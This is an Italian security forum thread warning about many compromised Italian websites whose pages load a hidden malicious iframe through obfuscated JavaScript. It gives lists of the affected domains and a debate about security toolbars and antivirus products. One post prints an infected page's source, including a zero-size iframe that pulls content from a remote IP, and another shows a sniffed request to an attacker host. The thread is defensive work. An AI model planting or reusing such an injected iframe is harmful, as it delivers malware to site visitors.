questa è una lista di domini su ip 194.242.61.210 con un javascript offuscato
contente un iframe malevolo

hxxp://www.24net.it
hxxp://www.affittiinsardegna.it
hxxp://www.aissa.it
hxxp://www.brosmanifatture.it
hxxp://www.caprillina.it
hxxp://www.cdm-dellamura.it
hxxp://www.chiesadicristoroma.it
hxxp://www.cmdm.it
hxxp://www.comitatomadeinitaly.it
hxxp://www.conventionplanning.it
hxxp://www.crvo.it
hxxp://www.dodibattaglia.it
hxxp://www.euroufficio.org
hxxp://www.ffuture.it
hxxp://www.fitvillage.net
hxxp://www.gierre-group.it
hxxp://www.giuditta-countryhouse.it
hxxp://www.hotelriomarina.it
hxxp://www.hotels-hostels-florence.com
hxxp://www.leonberger.it
hxxp://www.man-group.it
hxxp://www.misericordia.firenze.it
hxxp://www.noleggioitalia.it
hxxp://www.ocabianca.com
hxxp://www.pii-cinisello-balsamo.it
hxxp://www.rudolf-keller.it
hxxp://www.scenarionline.it
hxxp://www.tsunami-3d.com
hxxp://www.vespaclubmilano.it

Grande Mausap..solo una cosa edita i link non vorrei che qualcuno cliccasse.....

Grande Mausap..solo una cosa edita i link non vorrei che qualcuno cliccasse.....

Hai ragione mi sono sbagliato e non sono riuscito a correggere l'errore al volo si è impuntato il pc. Scusa

Hai ragione mi sono sbagliato e non sono riuscito a correggere l'errore al volo si è impuntato il pc. Scusa

No no ma figurati..ancora grazie del lavoro che metti a disposizione della comunità :)

Saluti :cool:

Ma se avessi opera con il java attivato prenderei i virus?

è la javascript che teli fa scaricare ed eseguire :)


@ mausap: mitico! :D

Con firefox uso noscript ma con opera è possibile fare una cosa simile o devo escludere tutti i siti e poi manmano aggiungere quelli che hanno il permesso di attivarli?:confused:

opera ha il sistema simile a noscript integrato.

volevo testare explorer ma niente
sembra non siano più hackerati

volevo testare explorer ma niente
sembra non siano più hackerati

l siti restano hackerati. Forse l'exploit in russia non è attivo
. Ma l'ip è uno di quelli appartente a un blocco infame.
Basta un attimo per farlo funzionare di nuovo. Il problema sono i siti sul server di hosting solutions

se analizzi i vari siti con uno sniffer vedrai che per ogni sito postato da lui, restituisce l'errore
GET /stat1/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www. comitatomadeinitaly.it/
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 81.95.148.42
HTTP/1.1 403 Forbidden

Come ha già detto mauro per adesso non sono attivi:D

Ciao

Comunque neppure io capisco perchè i siti non vengano ripuliti da questo codice malevolo..
come esempio carmen consoli che possiede ancora questo codice sorgente:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<frameset rows="27,*" framespacing="0" frameborder="no" border="0" >
<frame src="topbar.htm" frameborder="no" marginheight="0" marginwidth="0" scrolling="no" noresize>
<frame src="default.aspx" name="center" frameborder="no" marginheight="0" marginwidth="0" scrolling="auto" noresize>>
</frameset>
<noframes></noframes>
<iframe src='hxxp://81.29.241.236/acc2/anna/index.php?id=111' height='0' width='0' scrolling='no' frameborder='no'></iframe>

------------------------------------
vvv.tuttoperlaricevitoria.it
------------------------------------
Num. 1 SITES at IP 194.242.61.20
===================================
vvv.ipocriti.com
vvv.kfactor.it
vvv.hotellombardia.com
vvv.eosmilano.com
vvv.ilmarchiodelleidee.com
vvv.alecampi.it
vvv.altatensioneitalia.com
vvv.valuesearch.it
vvv.fabiosironi.com
vvv.eufootballuniversity.com
vvv.gibilogic.com
vvv.florisitalia.com
vvv.mouillettes-and-co.com
vvv.piccolomarte.it
vvv.metaorizzonte.it
vvv.gshosting.it
vvv.scienzaesocieta.org
vvv.sailingproject.org
vvv.exentiaparma.com
vvv.exentiaparma.com
vvv.dreo.it
vvv.nuovoteatro.com
--------------------------------------
Num. 22 SITES at IP 194.242.61.121
======================================
vvv.simoe.it
vvv.b2comunicazione.com
vvv.laserlisi.net
vvv.bagatti.it
vvv.antonuccirestauri.it
vvv.sportplanetbovalino.com
------------------------------------
Num. 6 SITES at IP 194.242.61.122
====================================
vvv.giacin.com
-----------------------------------
Num. 1 SITES at IP 194.242.61.123
===================================
vvv.bohumil.it
vvv.cosimobuccolieri.com
vvv.systemflight.it
vvv.cregut.it
vvv.turin-gallery.com
vvv.obiettivorisarcimento.it
vvv.zaiti.com
vvv.spinoneitaliano.it
vvv.barlettapianoforti.it
vvv.studiozulian.it
vvv.ceispt.org
-------------------------------------
Num. 11 SITES at IP 194.242.61.128
====================================

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more=

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more=

Ottimo le do una occhiata.

E leggetevi il mio blog altrimenti mi arrabbio :D

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more=

mi sa che il link è sbagliato

bravo mausap, ti meriti un'applauso :winner:
se non lo leggete mi arrabbio pure io! :D

@mausap:

come mai hai tolto il link al tuo blog dalla tua firma?

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more=

Grande segnalazione, quoto è un portento.

URL Analysis online: http://www.finjan.com/Content.aspx?id=574

bravo mausap, ti meriti un'applauso :winner:
se non lo leggete mi arrabbio pure io! :D

@mausap:

come mai hai tolto il link al tuo blog dalla tua firma?



Non lo vedi? A me sembra che ci sia ancora. Ho controllato anche nel profilo

mea culpa. avevo disabilitato le firme nelle opzioni del mio pannello di controllo del forum :p

mi sa che il link è sbagliato

vedi ora, te l'ho incapsulato nel tag code ;)

A proposito della barra finjan

Si puo' usare ma attenzione fatelo con l'opzione "mostra solo i siti pericolosi (rossi)"

SPESSO INDICA COME VERDI E QUINDI SICURI SITI PERICOLOSI (siti che puntano a inhoster - ucraina )


Poi indica il sito di carmen consoli come sicuro
adesso c'è ancora l'iframe

Non affidabile purtroppo.

A proposito della barra finjan

Si puo' usare ma attenzione fatelo con l'opzione "mostra solo i siti pericolosi (rossi)"

SPESSO INDICA COME VERDI E QUINDI SICURI SITI PERICOLOSI (siti che puntano a inhoster - ucraina )


Poi indica il sito di carmen consoli come sicuro
adesso c'è ancora l'iframe

Non affidabile purtroppo.
stamattina me lo ha bloccato...
evidentemente si basa sulle segnalazioni o cmq se uno segnalasse come sicuro un sito identificato malevolo forse viene sbloccato senza controllo :(

stamattina me lo ha bloccato...
evidentemente si basa sulle segnalazioni o cmq se uno segnalasse come sicuro un sito identificato malevolo forse viene sbloccato senza controllo :(

Spero di no .....altrimenti è "na chiavica"

vvv.milanomondana.it
---------------------------------------
Num. 1 SITES at IP 194.242.61.136
======================================
vvv.torte.it
---------------------------------------
Num. 1 SITES at IP 194.242.61.170
======================================
vvv.larotondasulmare.com
vvv.tvbsms.it
vvv.vacanze-ischia.it
vvv.dietinger.it
vvv.studioalbanese.it
vvv.alessandracanale.it
vvv.gbmeccanica.com
vvv.agrimanzoni.it
vvv.collezionialtamoda.it
vvv.comune.poggioreale.tp.it
vvv.royaltur.com
vvv.zonatortona.org
vvv.scais.it
vvv.micheladistefano.it
vvv.uiapoa.it
vvv.patriziaurbinati.it
vvv.progettosinergia.com
vvv.corazonlatino.it
vvv.zoldester.com
vvv.jatimusic.com
vvv.assonucleare.it
vvv.etruriarugby.it
vvv.vistamare-case.it
vvv.truffini.it
vvv.fagioielli.it
vvv.next-station.info
vvv.accadueo.net
vvv.dippolito.it
vvv.vinicamadresca.com
vvv.exportdental.com
vvv.sienaviplodge.it
vvv.mauromancia.it
vvv.winecom.it
vvv.cmat.it
vvv.theoryofmind.info
vvv.sienaviplodge.it
vvv.mauromancia.it
vvv.royaltur.net
vvv.tvbsms.com
vvv.winecom.it
vvv.cmat.it
vvv.cheap-hotel-florence.com
vvv.saporidelcuneese.it
vvv.villadelfini.it
vvv.stepscuoladidanza.it
vvv.luismedia.it
vvv.luismedia.it
vvv.zoldester.com
vvv.sssy.it
vvv.tinticarlo.it
vvv.sienanatura.net
vvv.basf-cv.it
----------------------------------------
Num. 52 SITES at IP 194.242.61.175
=======================================
vvv.sannicolamola.it
vvv.casalbertina.it
vvv.hotelrufolo.it
vvv.hotelpupetto.it
vvv.bluestarpositano.it
vvv.allegranzimarmisti.com
vvv.noleggisci2g.it
vvv.infoiper.it
vvv.metallurgicamotta.it
vvv.hotelmiravalle2000.it
vvv.brasseriehoublon.com
vvv.hotelmontepizzo.it
vvv.chryslersyncro.com
vvv.ituscany.it
vvv.matitablu.it
vvv.stamperiabaldan.it
vvv.silviocarta.it
vvv.metarex.it
vvv.sud-dinnerbar.it
vvv.valberti.com
vvv.ibrandoli.it
vvv.nuova3l.com
vvv.unimar.org
vvv.panguaneta.com
vvv.4-m.it
vvv.artlabstudio.it
vvv.sochive.com
vvv.rodewax.it
vvv.dolcemare.com
vvv.leottasrl.it
vvv.idloriaviaggi.it
vvv.aita-coibentazioni.it
vvv.clebari.com
vvv.difotografia.com
vvv.enricomaioli.com
vvv.ballandoballando-ge.it
vvv.barnesitalia.eu
vvv.cogegospa.it
vvv.unagro.it
vvv.vulcanair147.com
vvv.antlab.eu
-----------------------------------------
Num. 41 SITES at IP 194.242.61.177
=========================================
vvv.divinacommedia.com
------------------------------------------
Num. 1 SITES at IP 194.242.61.180
===================================

A distanza di un tot di tempo siamo ancora in queste condizioni, roba da pazzi!! :muro:

Hai capito perche' prendono di mira l'italia?

In altri paesi dopo 24 ore l'infezione sarebbe stata eliminata.

Se una societa' come hosting solutions delega la risoluzione di questo tipo di problemi ai clienti stiamo freschi.

VERGOGNA!!

Spero di no .....altrimenti è "na chiavica"

ho controllato ed effettivamente non la bloccava quella mattina..
le segnalazioni hanno valore per far analizzare un sito e quindi poi bloccarlo se identificano il codice malevolo presente.
carmen consoli ora è infatti bloccata ;)

tutti i siti di quella lista invece sono già bloccati.. non si può di certo dire che sia un'estensione chiavica!
è quella più aggiornata e che più garantisce la sicurezza allo stato attuale tra le toolbar... certo è che al momento non può garantire da sola la protezione :)

ho controllato ed effettivamente non la bloccava quella mattina..
le segnalazioni hanno valore per far analizzare un sito e quindi poi bloccarlo se identificano il codice malevolo presente.
carmen consoli ora è infatti bloccata ;)

tutti i siti di quella lista invece sono già bloccati.. non si può di certo dire che sia un'estensione chiavica!
è quella più aggiornata e che più garantisce la sicurezza allo stato attuale tra le toolbar... certo è che al momento non può garantire da sola la protezione :)

Mi spiace ma secondo me è completamente inutile la toolbar
anzi direi potenzialmente dannosa perche' segnala come puliti migliaia di siti infetti. Ho fatto la prova in questo momento

Fortemente sconsigliata o almeno va usata solo con la segnalazione dei siti rossi.

esempio

http://img340.imageshack.us/img340/6953/z20070728135555ea2.th.png (http://img340.imageshack.us/my.php?image=z20070728135555ea2.png)

è dannoso quanto un antivirus che non segnala tempestivamente il gromozon... a che serve segnalarne la presenza dopo la sua esecuzione (se ti va di lusso)?
e sai anche te che di antivirus che lo bloccano tempestivamente ce ne sono solo 3.

non nasce per offrire la sicurezza in un unico prodottino, non nasce per essere esclusiva, è nata per aggiungere un livello di protezione..
come tale può non conoscere tutti i siti visto che è un progetto nato da pochissimo e che per scansionare internet ci vuole tempo sopratutto se si tratta di bollare siti malevoli.

io rivedrei la tua posizione perchè parti dal presupposto che lei faccia il 95% del lavoro.. e non dico che è sbagliato (forse un giorno potrà farlo forse) ma sicuramente non è il suo scopo ;)
non arreca nessun danno semplicemente quei siti che lei non conosce li bolla come verdi di default, ma se non ci fosse stata quella segnalazione non avrebbe cambiato nulla.. ci saresti andato ugualmente ;)

è come pretendere che un software antimalware rilevi tutti le minacce e che potregga senza il bisogno di un antivirus :D


comunque se vogliamo essere costruttivi, basta iniziare a segnalare i siti che la toolbar non conosce in modo da farli analizzare. :)
è quello che si fa abitualmente con gli antivirus...

e sai anche te che di antivirus che lo bloccano tempestivamente ce ne sono solo 3.

cioè spiegati bene vuoi dire che se l'antivirus A ha la firma e lo blocca senza eseguirlo e l'antivirus B che ha la firma lo riconosce solo se eseguito? e del tipo A ce ne sono solo 3? se così fosse, sei veramente fuori strada, ciao

meglio questa o siteadvisor secondo voi?:)

meglio questa o siteadvisor secondo voi?:)
siteadvisor secondo me:)

è dannoso quanto un antivirus che non segnala tempestivamente il gromozon... a che serve segnalarne la presenza dopo la sua esecuzione (se ti va di lusso)?
e sai anche te che di antivirus che lo bloccano tempestivamente ce ne sono solo 3.

non nasce per offrire la sicurezza in un unico prodottino, non nasce per essere esclusiva, è nata per aggiungere un livello di protezione..
come tale può non conoscere tutti i siti visto che è un progetto nato da pochissimo e che per scansionare internet ci vuole tempo sopratutto se si tratta di bollare siti malevoli.

io rivedrei la tua posizione perchè parti dal presupposto che lei faccia il 95% del lavoro.. e non dico che è sbagliato (forse un giorno potrà farlo forse) ma sicuramente non è il suo scopo ;)

è come pretendere che un software antimalware rilevi tutti le minacce e che potregga senza il bisogno di un antivirus :D


comunque se vogliamo essere costruttivi, basta iniziare a segnalare i siti che la toolbar non conosce in modo da farli analizzare. :)
è quello che si fa abitualmente con gli antivirus...



Il problema è che indica come puliti siti che non lo sono. Un conto è non esprimersi un conto è dare il segnale di ok :-)

Non l'ho presa in considerazione per me . Poteva essere un valido aiuto per chi non ne sa troppo ma il colore verde su certi siti è ingannevole.
Abbassa perfino la mia soglia di attenzione e mi fa andare sparato su siti pericolosi. Suggerisco di usarla solo con la segnalazione dei rossi come si puo' fare facilmente modificando le opzioni. Personalmente non me la sento di consigliarla almeno per adesso.
Vai spiegare ad una persona di coccio che anche sei il colore è verde il sito puo' essere infetto lo stesso.

Per quanto riguarda gli antivirus sfondi una porta aperta. Nono sono efficaci e lo sappiamo tutti ormai.
Poi è la seconda volta che un analista di kaspersky sbaglia su un virus della famiglia gromozon che ho inviato dicendomi che è pulito.

Sandbox + account limitato + firerox (o opera)

e direi che si dovrebbe stare tranquilli durante la navigazione

cioè spiegati bene vuoi dire che se l'antivirus A ha la firma e lo blocca senza eseguirlo e l'antivirus B che ha la firma lo riconosce solo se eseguito? e del tipo A ce ne sono solo 3? se così fosse, sei veramente fuori strada, ciao

significa che non serve ad un cazzo che me lo identifichi dopo che è entrato attivo il gromozon (e già infettato il sistema) e non quei 30 secondi prima che poteva bloccarlo quando era in download. se non lo identifica proprio fa una figura migliore!
questa è la traduzione che mi hai chiesto..



@ mausap: comprendo il tuo punto di vista :)

@ mausap: comprendo il tuo punto di vista :)[/QUOTE]



Guarda per divertimento ho fatto l'analisi di un sito nello screenshot di prima

che poi postero ' sul blog

Morale delle favola dopo aver decodificato 4 javascript offuscati che mi hanno fatto girare su vari server ho trovato un bel virus che viene beccato solo

da fsecure
esafe
norman (analisi nella sandbox)
e panda

Dovrebbe trattarsi di una falsa toolbar che si chiama googlegoogletoolbar (invisibile credo)
oltre a chissa' quali altri porcherie targate gromozon.
Probabile che si sia anche tecniche rootkit etc.

Questi sono incredibili. Io filtrerei tutto il traffico dalla russia e dall'ucraina

adesso lo mando a lucas